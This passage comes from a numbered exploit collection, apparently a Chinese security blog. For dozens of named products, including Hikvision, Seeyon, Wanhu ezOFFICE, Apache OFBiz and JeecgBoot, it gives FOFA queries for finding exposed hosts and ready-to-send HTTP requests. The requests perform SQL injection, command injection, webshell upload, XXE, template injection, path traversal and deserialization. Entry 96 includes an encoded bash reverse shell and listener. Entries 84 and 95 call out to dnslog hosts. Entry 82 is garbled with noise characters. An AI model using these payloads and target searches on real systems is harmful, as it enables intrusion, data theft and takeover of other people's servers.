Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA: "IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request the file the injected command wrote:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA: icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. Jiecheng (捷诚) management information system CWSFinanceCommon SQL injection
FOFA: body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

The sId value is a time-based MSSQL injection: a vulnerable host delays the SOAP response by about five seconds.

65. Youkate (优卡特) 脸爱云一脸通 smart management platform 1.0.55.0.0.1 permission bypass
FOFA: title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456 / 123456 was created without authentication.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. Wanhu (万户) ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The vulnerability is confirmed when lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9 (the hash the UNION SELECT computes).

67. Wanhu (万户) ezOFFICE wpsservlet arbitrary file upload
FOFA: app="万户网络-ezOFFICE"
The newdocId and filename parameters set the name of the written file, dir sets the directory it is written to, and fileType sets its extension.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The written file is reachable at /defaultroot/platform/portal/layout/apoxkq.jsp.

68. Wanhu (万户) ezOFFICE wf_printnum.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. Wanhu (万户) ezOFFICE contract_gd.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. Wanhu (万户) ezEIP success.aspx command execution
FOFA: app="万户网络-ezEIP"
The SID header is the base64-encoded command: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk= decodes to type C:\Windows\win.ini. The __VIEWSTATE body carries the payload (omitted).
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. Bangyong (邦永) PM2 project management system Global_UserLogin.aspx SQL injection
FOFA: body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. Seeyon (致远) OA getAjaxDataServlet XXE
FOFA: app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%5D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

xmlValue is a URL-encoded XML document whose DOCTYPE declares an external entity &xxe; pointing at file:///c:/windows/win.ini and then references it in <d Index="VALUE">&xxe;</d>; the file contents come back in the signature field.

73. GeoServer wms remote code execution
FOFA: icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. Seeyon (致远) M3-server 6_1sp1 deserialization RCE
FOFA: title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA: app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then read the command output:

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. Newcapec (新开普) campus service management platform service.action remote command execution
FOFA: title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

The UnitCode value is a FreeMarker template that instantiates freemarker.template.utility.Execute and runs the command. Then request the file it wrote:

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 apparel management software UploadHandler.ashx arbitrary file upload
FOFA: body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
FOFA: icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

Then request the uploaded file:

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE (百为) traffic control router remote command execution
FOFA: BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. Superdata (速达) Tianyao software DesignReportSave.jsp arbitrary file upload
FOFA: app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 273
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

Then request the written JSP:

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. Uniview (宇视) video surveillance main-cgi password disclosure
FOFA: app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行, g, P5 a+ v! s2 K9 k2 E k
FOFA:app="思福迪-LOGBASE"7 ], S$ d: n% o
POST /bhost/test_qrcode_b HTTP/1.1
# p% g; a5 H' N h mHost: BaseURL
$ U5 Q# P% m' M& rUser-Agent: Go-http-client/1.1' j' A2 }( v! f8 k2 q
Content-Length: 23
/ b! x; q, ^5 G* P) ~8 QAccept-Encoding: gzip; Y, c0 ]9 P( `4 `; M8 `& a
Connection: close
* V6 e+ q" k$ Y& h v+ e2 mContent-Type: application/x-www-form-urlencoded
3 w( c* ^" R0 m; s& [Referer: BaseURL
; a) V r: A! s- B1 U- D4 R q! {) W9 \. `6 V
z1=1&z2="|id;"&z3=bhost
) w, n5 O& s0 W# p8 j- }
2 F: y- }; j4 C* l" k b s, z# V
83. JeecgBoot testConnection remote command execution
FOFA: title=="JeecgBoot 企业级低代码平台"
POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA: title=="JeecgBoot 企业级低代码平台"
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

The sql field is rendered as a FreeMarker template before use, so the Execute utility runs the command; the dnslog hostname is where the out-of-band callback is observed.

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA: body="sysaid-logo-dark-green.png"
Exploit request (the omitted payload writes a Godzilla webshell):
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Resulting webshell URL: http://x.x.x.x/userfiles/index.jsp

86. Tosei (Japan) self-service laundry machine RCE
FOFA: body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. DBAPPSecurity (安恒) Mingyu (明御) security gateway aaa_local_web_preview file upload
FOFA: title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

Then request /jfhatuwe.php (the suffix parameter, not the multipart filename, decides where the file lands).

88. DBAPPSecurity (安恒) Mingyu (明御) security gateway aaa_portal_auth_config_reset remote command execution
FOFA: title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

The type parameter decodes to a newline followed by echo '<?php echo "assdwdmpidmsbzoabahpjhnokiduw"; phpinfo(); ?>' >> /usr/local/webui/txzfsrur.php, so the injected line is appended to the web root. Then request /txzfsrur.php.

89. Seeyon (致远互联) FE collaborative office platform editflow_manager SQL injection
FOFA: title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

The path .js%70 is .jsp with the final letter percent-encoded, which slips past filters that match the literal extension; a vulnerable host evaluates 111*222 and returns 24642.

90. Hikvision (海康威视) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA: icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. Hikvision (海康威视) integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA: title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

Two bugs are chained here: the ..;/ segment reaches the orgManage handler through a path the front end treats differently, and fileName is then used for the download without traversal checks.

92. Hikvision (海康威视) operations management center session command execution
Fastjson command execution
hunter: web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. Qi An Xin (奇安信) Legendsec (网神) SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

Then request the uploaded file:

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. Qi An Xin (奇安信) Legendsec (网神) SecGate 3600 firewall obj_area_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

Then request the uploaded file (same attachements directory as entry 93):

GET /attachements/cciytdzu.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 8891
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>


The serializable extension element is deserialized server-side, which is where the gadget chain fires. Generate the payload with ysoserial; the DNS lookup on the dnslog domain confirms execution:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 8891
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz < 18.12.11 ProgramExport groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Empty credentials together with requirePasswordChange=Y get the request past the login check; the command output comes back in the exception message of the error response.

Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 128

groovyProgram='bash+-c+{echo,YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3IDA%2BJiE=}|{base64,-d}|{bash,-i}'.execute();

The base64 decodes to bash -i >& /dev/tcp/192.168.40.128/7777 0>&1 (the listener's address). Its two plus signs are sent as %2B because the body is form-encoded, and the {a,b} brace form keeps the command free of spaces, which Groovy's String.execute() would otherwise split on.

97. OneBlog v2.2.2 Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

PAYLOAD stands for the Shiro-encrypted serialized gadget (see the note at the top of this article); the command to run is carried in the X-Token-Data header.


98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
